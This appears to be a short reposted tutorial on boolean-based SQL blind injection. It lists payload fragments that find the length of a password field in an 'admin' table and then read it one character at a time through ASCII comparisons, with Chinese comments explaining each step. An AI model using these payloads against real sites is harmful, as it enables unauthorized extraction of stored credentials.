Home > Database > Mysql Tutorial > About sql blind injection syntax

About sql blind injection syntax

藏色散人
Release: 2020-04-03 13:16:51
forward
2312 people have browsed it

If the page does not display wrong numbers, use blind injection syntax to determine the data content based on page changes

Get the data length:

and (select top 1 len(列名) from 表名)>5
and (select top 1 len(password) from admin)>16//错误
and (select top 1 len(password) from admin)>15//正常
Copy after login

Get the specified number of digits of data:

and (select top 1 asc(mid(列名,位置,1)) from 表名)>97
and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常
and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97
Copy after login

mid(字符串,截取的位置,截取字符数)
asc() //将字符转换成ascii码 方便进行比较
Copy after login

Recommended: "mysql video tutorial"

The above is the detailed content of About sql blind injection syntax. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
sql
source:cnblogs.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template